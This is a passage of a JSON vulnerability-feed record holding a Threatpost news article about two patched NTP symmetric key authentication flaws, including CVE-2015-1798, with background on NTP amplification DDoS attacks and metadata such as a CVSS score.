8p2](<http://www.ntp.org/downloads.html>).\n\nThe first vulnerability, CVE-2015-1798, affects ntp-4.2.5p99 to ntp-4.2.8p1 versions using symmetric key authentication. According to the advisory, packets sent without message authentication code (MAC) are accepted as though they had one.\n\n\u201cAn attacker may be able to leverage this validation error to send packets that will be accepted by the client,\u201d the advisory said.\n\nThe second flaw affects versions xntp3.3wy to version ntp-4.2.8p1 that use symmetric key authentication, and creates a denial of service condition when peering hosts receive packets where the timestamps don\u2019t match.\n\n\u201cAn attacker who periodically sends such packets to both hosts can prevent synchronization,\u201d the advisory said.\n\nNTP is a protocol used to synchronize time on computer clocks; considered a set-and-forget feature on networks. Hackers who specialize in distributed denial-of-service attacks found a way to exploit vulnerabilities in NTP to amplify DDoS attacks to, at the time, unprecedented levels.\n\nLast February, traffic optimization company CloudFlare reported a [NTP-based DDoS attack](<https://threatpost.com/ntp-amplification-blamed-for-400-gbps-ddos-attack/104201>) against one of its customers that peaked at 400 Gbps, topping the previous high of 300 Gbps against Spamhaus in March 2013.\n\n\u201cRemarkably, it is possible that the attacker used only a single server running on a network that allowed source IP address spoofing to initiate the requests,\u201d CloudFlare CEO Matthew Prince told Threatpost at the time.\n\nNTP-based DDoS attacks are a relatively simple way of spoofing IP addresses in order to disrupt websites or web-based services.\n\n\u201cNTP attacks are definitely on the rise. Because the amplification factor per misconfigured server can be 10x as large as a typical DNS amplification attack, they pose a significant risk,\u201d Prince said.\n\nRed Hat\u2019s Miroslav Lichvar reported the issue in early March to NTP, which patched the vulnerabilities yesterday.\n", "modified": "2015-04-13T12:44:45", "published": "2015-04-08T11:37:31", "id": "THREATPOST:5769C48C396166703CD9313DCCE52178", "href": "https://threatpost.com/two-ntp-key-authentication-vulnerabilities-patched/112067/", "type": "threatpost", "title": "NTP Symmetric Key Authentication Security Vulnerabilities Patched", "cvss": {"score": 1.8, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}